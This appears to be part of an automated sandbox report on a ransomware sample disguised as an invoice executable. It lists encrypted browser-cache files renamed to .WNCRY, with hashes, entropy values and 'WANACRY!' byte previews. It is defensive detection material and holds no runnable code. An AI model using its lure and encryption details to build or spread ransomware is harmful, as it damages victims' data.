                                                          SSDEEP:768:jbufkD8X9a5+udN5VbxoV+QX7uZ148ghofA6FLBUfwUNyxa+WVJ34DpfU35Brz36:jaf08X9KbPxhmuZ1L7Va+4JoUJBrpvGV
                                                          MD5:612FC3133952349E230B1CFE5BC2C218
                                                          SHA1:0D26948E9BB764F67486548D09763255500050AE
                                                          SHA-256:192E4C5B714AEA88BF9834A7EFE7C2D76BCB24E01E2396869F60C169634D13C8
                                                          SHA-512:2CEE9BB4B13A906159DAFDB195823E8308F9485FD5F2EE1FB27FC2B0253BADD90AC80723EE4AB0084E903E0ED1E2EE531EF3B392CB25F9C18C8AB830900AE4FA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......D.M>.dp...^..y6.o...%.j.r....@.hT.... ..`.0..]...*....y..4KL.z.....wM..s.^...`I.+T......+4.S..<..wE(X...m..x*A...a...X......ag.l(.@.d....6G.u.0WH.F~..@"D.W...G.....x.<.6...._%....J..".y.....F..#wdo.)w....74.St......[...+.....1R.....,..5../^.................y.^.....c..*..B... .py...`..\..L7...^.=.....b...;....v..:....@.....E.U.f.K...ao7....z.w....bN..p....[....c....w...|ro.kV...t.@R....)2.ZG....;'.PD./.....0....I./g.tW7.................,.......dL 1.....*"....>.?...J...*.F.'.X..E&....]#z.....k.kV..JH..Y@.......5J..$.amip.0E.../...`.wwu..C^.J......r.A...N...t.J.kPZK]9...l%.e....Z. Q..#.&.VW[<..q`5Z}.....g.@2....Ty<....w.P.z.-..f.t.1...My.?..?..U.z....lY.VAVd.q.o..E......s...J....;...s.]._.\.-.M..a.b..;D.........S.lp.~.9.^9........."..p..<v....En!..sG.....b.......Zp..b|.H.:....*...QIp....|.J.Cj.pjG.{N^]...$"y{;v'0....6.n..JUQ$...M)..06at.`...E....l......f..).[n._..P.KO...`B....)...T|..|2...#N.V...0\.....Ehf..B_....l..v.vPG.A..T.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):349176
                                                          Entropy (8bit):7.999482463761785
                                                          Encrypted:true
                                                          SSDEEP:6144:69p8oevnHDltfhcJUDUTIHgHUkbeCe7HT+kJXZb3OVDkgTmpTEGEtT/:5vHDlP7U4gHbbeCe7z+kJXZQgJpW/
                                                          MD5:046821D3CF28BBDB39C59EF5DB747FF0
                                                          SHA1:E964BAEE38C32D65C8FF2C52B837331AECB41CD8
                                                          SHA-256:EF45217960A5D684FCA383521FB9097B5BAF405C3A89A39FCB0007AFB35CF3A8
                                                          SHA-512:936F9F7B4531AA57A9520EB4A3A40EB4990E7025CB2BDA5AD407DD7DCE79146E3109AF58719C6A1749B00A72AB8E6048BBCD253273F44CA9DB6614F464C184F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......4).%.g..B.."V.eA.s.....'Q...E.SRB...5.....#L..XN.. "...9uN..l...a3.).>.W...u....4.q.....^3..J...;....f!r...T..~z.K....Py`..^.~.F...~q..X.U.L>..,..*}Uu.*.B).'.=..........:.......?.K.K...O>.{#.]...u.......T.q....g.W.e.d`5..}S...\........yGk.....R......OD\.l.X{3......,I60....hy.z8j........ h..-k...b.9....Su..9....a..t......q...1.D..A......y".GXl".5."PY..........ET.o.....x..\0..Er...5K.Fw.....ae.P......ErY].:...G...^......Q...5.>.fu..".....g.......,...d.?..7.w..E./..a(..&O..5'....\h.U.FGq...J..6.~..:.wzL..>.V...7S...$5.......4..G..{U...."Za..a./.Q.......y.).a...o...W.'W.....X@.@...d..|......A.....W9B.B..`u.a...v.I.R.....C..*..#.k...Q...l.....M$@.El..SM.....Y....R......N7.....O)~.!-/l..@y....JI..Y....[/]-{.../P0j.y....o.)H.x..2>.i..Z}.p.x..E....}A3.6v.A.Yb...g.Q..BE.....r.?KLH..k....yy...l/..../.W.9..I.r.B>l.!9.... .M..t.o..d.,.[.8.l..1./..4.#)Y.\...+.v(..{..P..g.....`..$.SC.#..+o.#..o\.....}k.I.(....l...T...n.][8.....{..r

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):349176
                                                          Entropy (8bit):7.999482463761785
                                                          Encrypted:true
                                                          SSDEEP:6144:69p8oevnHDltfhcJUDUTIHgHUkbeCe7HT+kJXZb3OVDkgTmpTEGEtT/:5vHDlP7U4gHbbeCe7z+kJXZQgJpW/
                                                          MD5:046821D3CF28BBDB39C59EF5DB747FF0
                                                          SHA1:E964BAEE38C32D65C8FF2C52B837331AECB41CD8
                                                          SHA-256:EF45217960A5D684FCA383521FB9097B5BAF405C3A89A39FCB0007AFB35CF3A8
                                                          SHA-512:936F9F7B4531AA57A9520EB4A3A40EB4990E7025CB2BDA5AD407DD7DCE79146E3109AF58719C6A1749B00A72AB8E6048BBCD253273F44CA9DB6614F464C184F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......4).%.g..B.."V.eA.s.....'Q...E.SRB...5.....#L..XN.. "...9uN..l...a3.).>.W...u....4.q.....^3..J...;....f!r...T..~z.K....Py`..^.~.F...~q..X.U.L>..,..*}Uu.*.B).'.=..........:.......?.K.K...O>.{#.]...u.......T.q....g.W.e.d`5..}S...\........yGk.....R......OD\.l.X{3......,I60....hy.z8j........ h..-k...b.9....Su..9....a..t......q...1.D..A......y".GXl".5."PY..........ET.o.....x..\0..Er...5K.Fw.....ae.P......ErY].:...G...^......Q...5.>.fu..".....g.......,...d.?..7.w..E./..a(..&O..5'....\h.U.FGq...J..6.~..:.wzL..>.V...7S...$5.......4..G..{U...."Za..a./.Q.......y.).a...o...W.'W.....X@.@...d..|......A.....W9B.B..`u.a...v.I.R.....C..*..#.k...Q...l.....M$@.El..SM.....Y....R......N7.....O)~.!-/l..@y....JI..Y....[/]-{.../P0j.y....o.)H.x..2>.i..Z}.p.x..E....}A3.6v.A.Yb...g.Q..BE.....r.?KLH..k....yy...l/..../.W.9..I.r.B>l.!9.... .M..t.o..d.,.[.8.l..1./..4.#)Y.\...+.v(..{..P..g.....`..$.SC.#..+o.#..o\.....}k.I.(....l...T...n.][8.....{..r

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):127752
                                                          Entropy (8bit):7.998624961542022
                                                          Encrypted:true
                                                          SSDEEP:3072:F1on50LC1r4C2A/fGzgv4gQRFpUaOQv/ub2Sb9I:InNJLG2g3aaOMWh2
                                                          MD5:AECE63CB3F4ECA5E15DFE4277EDFABA1
                                                          SHA1:3A10ACF0992F258BC4265B50C0D2FBF19EB797B7
                                                          SHA-256:3CBDBD33E4F901C8C1727A380CF44AF04BAA01B704F58826029392DC72EDA567
                                                          SHA-512:E39E38897276DD2DC246339AFF51F4A0D7FF818F75E6D6759D731A35EA35AF363EC875DC6BFCA6FBD11E0E0EAA20F1FFFFBB9C18B747910A9DDD809DF9888EEC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....:n...[.!..%....].I..e..p....S....K.9}.:.J5..|F=A....V.....Gr^W$.~&v.+a..Y.?[..ub.L.........{..g.h..t;&.....dMM.....P....D.m7^..i.F.....0@...J.....).......$.8....zY\jO...N.Hw..q}z..QR:w!......x..........v#5.FII).1.o.FM.>.5........5.P.L!.R$..w.].............%'..]f@.O......E..Bt.9E.2.......]h..q .:...-...-@.d..WU.{S.Y....\..5.^..."..xw.C....3NN4.A...M.o....|.w(g..G.......7.Ia..t.m.B.].Vo...*......N..X$7..up.m_d...i.F.hC..f......3...A....|..6..I....t.}2l.L.lIL....n.'/.~.M_..L.0{=,h`.N.9...X..l...8..3^|yW....P.....r...V.%.O.R4..4......|!...+Z../..Mu*Ms.G.'">_.{p=..r...O7.y....n..P.9..:.V...?.Y....R..G..?. .B...n.1..H..E.......\..........-..z.J......H.Y....Fn6G..@..;.i..H..I..Ih..Y/u.........<9...J..../.1....:.@.*...c.z..b...5..IcFc.FO.M&AC.w...#p.j{.h..S|...5%n..f..c.W.*E(.Bu..>Z&6.|=....OpP..N...."... Z.Nk......^..Yr.>....m...:q..(o`.vO..c.....>..xA.V..H.]g......p.i......~..fJRu...U..4.0.E*...5.o....=.pNd.....(..ix3w$.m3.......&".L

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5_KhThI0onehz_-3sl58j0dOeLI.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):127752
                                                          Entropy (8bit):7.998624961542022
                                                          Encrypted:true
                                                          SSDEEP:3072:F1on50LC1r4C2A/fGzgv4gQRFpUaOQv/ub2Sb9I:InNJLG2g3aaOMWh2
                                                          MD5:AECE63CB3F4ECA5E15DFE4277EDFABA1
                                                          SHA1:3A10ACF0992F258BC4265B50C0D2FBF19EB797B7
                                                          SHA-256:3CBDBD33E4F901C8C1727A380CF44AF04BAA01B704F58826029392DC72EDA567
                                                          SHA-512:E39E38897276DD2DC246339AFF51F4A0D7FF818F75E6D6759D731A35EA35AF363EC875DC6BFCA6FBD11E0E0EAA20F1FFFFBB9C18B747910A9DDD809DF9888EEC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....:n...[.!..%....].I..e..p....S....K.9}.:.J5..|F=A....V.....Gr^W$.~&v.+a..Y.?[..ub.L.........{..g.h..t;&.....dMM.....P....D.m7^..i.F.....0@...J.....).......$.8....zY\jO...N.Hw..q}z..QR:w!......x..........v#5.FII).1.o.FM.>.5........5.P.L!.R$..w.].............%'..]f@.O......E..Bt.9E.2.......]h..q .:...-...-@.d..WU.{S.Y....\..5.^..."..xw.C....3NN4.A...M.o....|.w(g..G.......7.Ia..t.m.B.].Vo...*......N..X$7..up.m_d...i.F.hC..f......3...A....|..6..I....t.}2l.L.lIL....n.'/.~.M_..L.0{=,h`.N.9...X..l...8..3^|yW....P.....r...V.%.O.R4..4......|!...+Z../..Mu*Ms.G.'">_.{p=..r...O7.y....n..P.9..:.V...?.Y....R..G..?. .B...n.1..H..E.......\..........-..z.J......H.Y....Fn6G..@..;.i..H..I..Ih..Y/u.........<9...J..../.1....:.@.*...c.z..b...5..IcFc.FO.M&AC.w...#p.j{.h..S|...5%n..f..c.W.*E(.Bu..>Z&6.|=....OpP..N...."... Z.Nk......^..Yr.>....m...:q..(o`.vO..c.....>..xA.V..H.]g......p.i......~..fJRu...U..4.0.E*...5.o....=.pNd.....(..ix3w$.m3.......&".L

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5fBhIWX2NfxoiM-aOLeKJczoLSY.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):234376
                                                          Entropy (8bit):7.9991731149501195
                                                          Encrypted:true
                                                          SSDEEP:6144:NNpxAwqvcC1Dcl56UfRWbvDZ05VaA0igqqNI:NNpxNkL1DclMUZWLZ2gZI
                                                          MD5:CFCAB5EA7DCD6737618CA67D949A06E5
                                                          SHA1:7859F99648237DC62325356D5F4A330182A1FD20
                                                          SHA-256:418CF230DB8E35B649ECC4C69DD2A4C0D44049E3A51B68153CAE5FE0298805E4
                                                          SHA-512:6E043E5A9FDC069804BCC2432B8FAA4EECE6D9A56F994B483320DFB2D4CCF49AC640DDBCDEB7037CD5AD9D36300232C77710A56AAE6973761A63F93D4A637BC9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....*...M.C.M...-...O.|tU_.....%M....2T...>RT...=.I.n.H..xOS..K._.\.3..D$>.s..?fc..K.L.G.......df.Of$...a.I...I.....3.z0.F.c..<.s.F..].ul.m..A..?....L<.*..kj....4"._.W.\....P.:$.%:.m@.. @;....Q.z....;...I...oq..*."1.C..,....k.h@.Cg..G.g,.......wo....c........d/..uA.,<`.3..u...I..ms.2.,_...ZU..n.RY=.q.&.%)...3....i\..q....A..`.c....5X.......au.......TD........*.0!..x.cZ.e.s..&,.!.{Sa.....PE..K.G32.-......(..|;2+.$s.t...L..!.}@~.y.(S...D:p..$...V!....K..u.H=.......D....W}n..x]....@#.aW4.h...m....fM.7....F.a.z.T&.X..f...Z..L......~[...Sw..."./.tH...TH.. S..I...]..E.d;H..N(..@....x.,;4j.l.$e........5....~.x.`.9..w.@..s..v7.Q...Fe/.g..I.......d.mJ..OW...-h..+.s._J.u.!>...<)..%..T...WG....jd.......".....d.@.A..%.!..sr.....l.[.,.n.$....!../.{Lx...8......... # 8!u7.V..ZPp.6....Uw.#.*(...wP1.=.... .(..N..y4s.n.D.X.|.`L._.Z...".k..S.o\.e...bl..N.Z.+.....N...o.$u.>8.Tq.#7%.p<jX.]..../!27.T....4S....P.X.39..&.R.....* .Kz Y ..pd..../.......`...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\5fBhIWX2NfxoiM-aOLeKJczoLSY.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):234376
                                                          Entropy (8bit):7.9991731149501195
                                                          Encrypted:true
                                                          SSDEEP:6144:NNpxAwqvcC1Dcl56UfRWbvDZ05VaA0igqqNI:NNpxNkL1DclMUZWLZ2gZI
                                                          MD5:CFCAB5EA7DCD6737618CA67D949A06E5
                                                          SHA1:7859F99648237DC62325356D5F4A330182A1FD20
                                                          SHA-256:418CF230DB8E35B649ECC4C69DD2A4C0D44049E3A51B68153CAE5FE0298805E4
                                                          SHA-512:6E043E5A9FDC069804BCC2432B8FAA4EECE6D9A56F994B483320DFB2D4CCF49AC640DDBCDEB7037CD5AD9D36300232C77710A56AAE6973761A63F93D4A637BC9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....*...M.C.M...-...O.|tU_.....%M....2T...>RT...=.I.n.H..xOS..K._.\.3..D$>.s..?fc..K.L.G.......df.Of$...a.I...I.....3.z0.F.c..<.s.F..].ul.m..A..?....L<.*..kj....4"._.W.\....P.:$.%:.m@.. @;....Q.z....;...I...oq..*."1.C..,....k.h@.Cg..G.g,.......wo....c........d/..uA.,<`.3..u...I..ms.2.,_...ZU..n.RY=.q.&.%)...3....i\..q....A..`.c....5X.......au.......TD........*.0!..x.cZ.e.s..&,.!.{Sa.....PE..K.G32.-......(..|;2+.$s.t...L..!.}@~.y.(S...D:p..$...V!....K..u.H=.......D....W}n..x]....@#.aW4.h...m....fM.7....F.a.z.T&.X..f...Z..L......~[...Sw..."./.tH...TH.. S..I...]..E.d;H..N(..@....x.,;4j.l.$e........5....~.x.`.9..w.@..s..v7.Q...Fe/.g..I.......d.mJ..OW...-h..+.s._J.u.!>...<)..%..T...WG....jd.......".....d.@.A..%.!..sr.....l.[.,.n.$....!../.{Lx...8......... # 8!u7.V..ZPp.6....Uw.#.*(...wP1.=.... .(..N..y4s.n.D.X.|.`L._.Z...".k..S.o\.e...bl..N.Z.+.....N...o.$u.>8.Tq.#7%.p<jX.]..../!27.T....4S....P.X.39..&.R.....* .Kz Y ..pd..../.......`...

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\7keH62cNTOqo8SU4xXMfYfcmvcI.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2392
                                                          Entropy (8bit):7.922641736574049
                                                          Encrypted:false
                                                          SSDEEP:48:bknKWlAYaMwJIal5nZCtYabfQn7+n4GW6Kyco3ky7U0K:otfuIallArbI7+n4GW6JcYkkU0K
                                                          MD5:9959AC3CCD6C0818221C52A94723C403
                                                          SHA1:5685B768D2C80C5E1C70EF7B5E0CF8B3D3985DA5
                                                          SHA-256:B9C246FE81ABAACB1DD60D6363B235A6B6C36412B420A888CEE67BFDF4D2BF71
                                                          SHA-512:22F29F4954DD85DAAE868268C4FC3565DEB8CCAD294EF99B859D52F6B142C64D8E15D53FFD8AB19C72860E614A83134B21A15D9F29937A1338E61AE8F641D518
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........Bz...+I.....o.MK.D3.:..R..km1.Z....[._...Q..........p..\..2\Q......$..U.......yal.wTQ)...b..-...b.U....x..I;.4.S..'...&..H;.jq.E.C.M.L.|Y/d9..!xY...EK.O.:`7"..t..Dvf...P....)...).n@^....irF....&.2....dWG.&i..(.C.:.i...P.k.h...vRZ...Wy5..T......6..........|.:N..|/..9..[.={...U...u.......X.<...'jpX..D?..<V,...M.q^..Ov.q....S..z.....M.f...c,yJ...e....r.{_.z...f.:....)..Q*...(.u.5.3..b.'.....E........!.E=.C...D7.._.%.......`......r...*]..$_^y}..H...d.b.f...V.....:C2....F..0'v.*...^.k1....^K..kH.V..pe.f........T.3..(.x....>:.b(.1.xz.c?....v.]N~q{z].%K...Ahl.76oM.P....."s..:..*`|.....8....w.8Sfsp..T'.W.......3h.Ud.....mX...|...........3~..s+._9..K...kL.S...@1X.........F+$..........B_....K...Hk.L....6....XW..t.. p...%>...*-..1P=i0..>2.S'l@...7.|....^.XP.=..../.A]H...M!z@...!q9...e.6F{...@..0.u0}.$.z...A.X....{..~L....n..5..i.'..H...H}HD..A.8."....& .....,.zw{..e.%.,...*...l.s......t.......~..E..j...Qn_z...5.r=.o%=.;..%..y

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\7keH62cNTOqo8SU4xXMfYfcmvcI.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2392
                                                          Entropy (8bit):7.922641736574049
                                                          Encrypted:false
                                                          SSDEEP:48:bknKWlAYaMwJIal5nZCtYabfQn7+n4GW6Kyco3ky7U0K:otfuIallArbI7+n4GW6JcYkkU0K
                                                          MD5:9959AC3CCD6C0818221C52A94723C403
                                                          SHA1:5685B768D2C80C5E1C70EF7B5E0CF8B3D3985DA5
                                                          SHA-256:B9C246FE81ABAACB1DD60D6363B235A6B6C36412B420A888CEE67BFDF4D2BF71
                                                          SHA-512:22F29F4954DD85DAAE868268C4FC3565DEB8CCAD294EF99B859D52F6B142C64D8E15D53FFD8AB19C72860E614A83134B21A15D9F29937A1338E61AE8F641D518
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........Bz...+I.....o.MK.D3.:..R..km1.Z....[._...Q..........p..\..2\Q......$..U.......yal.wTQ)...b..-...b.U....x..I;.4.S..'...&..H;.jq.E.C.M.L.|Y/d9..!xY...EK.O.:`7"..t..Dvf...P....)...).n@^....irF....&.2....dWG.&i..(.C.:.i...P.k.h...vRZ...Wy5..T......6..........|.:N..|/..9..[.={...U...u.......X.<...'jpX..D?..<V,...M.q^..Ov.q....S..z.....M.f...c,yJ...e....r.{_.z...f.:....)..Q*...(.u.5.3..b.'.....E........!.E=.C...D7.._.%.......`......r...*]..$_^y}..H...d.b.f...V.....:C2....F..0'v.*...^.k1....^K..kH.V..pe.f........T.3..(.x....>:.b(.1.xz.c?....v.]N~q{z].%K...Ahl.76oM.P....."s..:..*`|.....8....w.8Sfsp..T'.W.......3h.Ud.....mX...|...........3~..s+._9..K...kL.S...@1X.........F+$..........B_....K...Hk.L....6....XW..t.. p...%>...*-..1P=i0..>2.S'l@...7.|....^.XP.=..../.A]H...M!z@...!q9...e.6F{...@..0.u0}.$.z...A.X....{..~L....n..5..i.'..H...H}HD..A.8."....& .....,.zw{..e.%.,...*...l.s......t.......~..E..j...Qn_z...5.r=.o%=.;..%..y

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\9NAKqY_tlD66IpqKerRN4qs4P0c.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2392
                                                          Entropy (8bit):7.921916540670038
                                                          Encrypted:false
                                                          SSDEEP:48:bkxOeLFpHPm8RhxMox78XOIrHeNMfofUUA3/1DFka13SWx/3hmYFy:oxOerHPja88eMf0QdDOaRv5VFy
                                                          MD5:F9B0AA8EF2BA52120294F7A6D86AA65A
                                                          SHA1:70B51B6FEE3D1B3E4F7AD65B31E9A878086C2D7D
                                                          SHA-256:F85FC68905264CA8C11FAE3540178554249BC4E2709AF0772E189962255A1EE2
                                                          SHA-512:0BD5F21BEEB691B9BEA12EA8A5E760C38AE9B9D93E2C65E195E84875AB94C6F0D7C073CEA461C4C779BB5E838A5B18C9B4E3EBCE7602D60FFE7C959E8299E7D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........2..g...s..$@Kv.X..P......#.>.........../Mj.%]W...&.$.......o..4).......Q=...2........Bb.{..A/;..x.d6p7P.......U^a.m.g.W.>4O..8.B.V...].QBPS.4s...R.!.P.4K2.R.....Y.B.. .J[).h.k...~.O..4...K.....e.<.....(M.......V@....o.P nx.....@...........>.........1...r.L..G=...==0....N. 7?.c..<..._.k8..@7.q..u....N...p....0...k.k?.J<.s~..OnD.<lu.K........g"....?........m.{7...Ve...=...j..v..|+BF{16K..h......p....k4.s.0.c2..$.K`t..x.Ry......P.........7.j~..39(..@eg..&.{R.i..Xc.h....../....%...c;...?UQ.*.^cdJ=..b..:=J.?...0..h...]..83"..rg...._0...g.....>|....J..rg.r.%........a\mr....E.1g.P.-~....ote.$ #<D.....B.e.4....WP2.1.1...i..{.j.1......,....'.}..<6G..." .R&,..R.\.T0........!.6.n.W.../.?.2l.Yw...eA....J...^..U.(.h.........g*=(I..*.~WxR0.Z..a$.q.=.........M]...:..x.4&7S-7..`_.(np{.fi.8.S.5f.....X.:.......^.s..nql.1a..3.....j..)...]I.V].1.s..F..t....+..(....nX..?.Y.vY&..s.1^Q.o.;.Q..s......5N7..o`.)|H.h.;I.@e...y/...FR.....[0.L

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\9NAKqY_tlD66IpqKerRN4qs4P0c.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2392
                                                          Entropy (8bit):7.921916540670038
                                                          Encrypted:false
                                                          SSDEEP:48:bkxOeLFpHPm8RhxMox78XOIrHeNMfofUUA3/1DFka13SWx/3hmYFy:oxOerHPja88eMf0QdDOaRv5VFy
                                                          MD5:F9B0AA8EF2BA52120294F7A6D86AA65A
                                                          SHA1:70B51B6FEE3D1B3E4F7AD65B31E9A878086C2D7D
                                                          SHA-256:F85FC68905264CA8C11FAE3540178554249BC4E2709AF0772E189962255A1EE2
                                                          SHA-512:0BD5F21BEEB691B9BEA12EA8A5E760C38AE9B9D93E2C65E195E84875AB94C6F0D7C073CEA461C4C779BB5E838A5B18C9B4E3EBCE7602D60FFE7C959E8299E7D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........2..g...s..$@Kv.X..P......#.>.........../Mj.%]W...&.$.......o..4).......Q=...2........Bb.{..A/;..x.d6p7P.......U^a.m.g.W.>4O..8.B.V...].QBPS.4s...R.!.P.4K2.R.....Y.B.. .J[).h.k...~.O..4...K.....e.<.....(M.......V@....o.P nx.....@...........>.........1...r.L..G=...==0....N. 7?.c..<..._.k8..@7.q..u....N...p....0...k.k?.J<.s~..OnD.<lu.K........g"....?........m.{7...Ve...=...j..v..|+BF{16K..h......p....k4.s.0.c2..$.K`t..x.Ry......P.........7.j~..39(..@eg..&.{R.i..Xc.h....../....%...c;...?UQ.*.^cdJ=..b..:=J.?...0..h...]..83"..rg...._0...g.....>|....J..rg.r.%........a\mr....E.1g.P.-~....ote.$ #<D.....B.e.4....WP2.1.1...i..{.j.1......,....'.}..<6G..." .R&,..R.\.T0........!.6.n.W.../.?.2l.Yw...eA....J...^..U.(.h.........g*=(I..*.~WxR0.Z..a$.q.=.........M]...:..x.4&7S-7..`_.(np{.fi.8.S.5f.....X.:.......^.s..nql.1a..3.....j..)...]I.V].1.s..F..t....+..(....nX..?.Y.vY&..s.1^Q.o.;.Q..s......5N7..o`.)|H.h.;I.@e...y/...FR.....[0.L

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.18107255835841
                                                          Encrypted:false
                                                          SSDEEP:6:bkEliefFB7FQuY27Lf8hZW4ZWMEc9RRAHKVtK0koEc07ilo/qVhqPtR1Mz2AUfn:bkEcsFBCuY28PWHMEcTVtKzo707iIqVW
                                                          MD5:F14C237045EC49722A3EA4CB048CC4D3
                                                          SHA1:FA6C7A17A1AE7026A5FF54B9F20948E3AE275544
                                                          SHA-256:E5C7E373E04BBF973E428F7DCB2B70A0908D6593A2A33E727B25E850BAC622F0
                                                          SHA-512:8AB24BFF5310827B565A24142C6812C5FDC491D841E0B6B894D031C56CA3034A9874D2C6D0909BC8D6B180616C4BE78D45F8A7A97C9DB4C60B532A3FE5D0266D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....u(JU..-..!..}a.>k...H.tt..%..:^.X.k.....*3..8......A'7..`+...a..L..I..h....|.bF.,....O.....;kqJ.A..>...4.OQ+..9..$...ta..+4..3r!...dm..S.H.:.....U........U..b...M.|...S?.+.n~..G.........$o..l&.Sf.....p_..mC...UsQ.....KB.5.A."J...A..i...(..).=#.............)SM...9..6..D:

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.18107255835841
                                                          Encrypted:false
                                                          SSDEEP:6:bkEliefFB7FQuY27Lf8hZW4ZWMEc9RRAHKVtK0koEc07ilo/qVhqPtR1Mz2AUfn:bkEcsFBCuY28PWHMEcTVtKzo707iIqVW
                                                          MD5:F14C237045EC49722A3EA4CB048CC4D3
                                                          SHA1:FA6C7A17A1AE7026A5FF54B9F20948E3AE275544
                                                          SHA-256:E5C7E373E04BBF973E428F7DCB2B70A0908D6593A2A33E727B25E850BAC622F0
                                                          SHA-512:8AB24BFF5310827B565A24142C6812C5FDC491D841E0B6B894D031C56CA3034A9874D2C6D0909BC8D6B180616C4BE78D45F8A7A97C9DB4C60B532A3FE5D0266D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....u(JU..-..!..}a.>k...H.tt..%..:^.X.k.....*3..8......A'7..`+...a..L..I..h....|.bF.,....O.....;kqJ.A..>...4.OQ+..9..$...ta..+4..3r!...dm..S.H.:.....U........U..b...M.|...S?.+.n~..G.........$o..l&.Sf.....p_..mC...UsQ.....KB.5.A."J...A..i...(..).=#.............)SM...9..6..D:

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\11\D_0mE1U1YmZvpLaz5wDHB6P-DAI.br[1].js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):192872
                                                          Entropy (8bit):7.999060047902946
                                                          Encrypted:true
                                                          SSDEEP:3072:b/DWQZUWYUySdW41VaNQaC/QYIox5GltwU3PM6biPL5YdqKYMhJvPDO6U6tzEG3I:2JH7iW4zj9/Qboxs7tPM6buL5z7MzvLw
                                                          MD5:3BA6D669B9A240DBC6B55F894983370D
                                                          SHA1:BFC4442283CCAEF644DB1D696EDCA57AC883DCA3
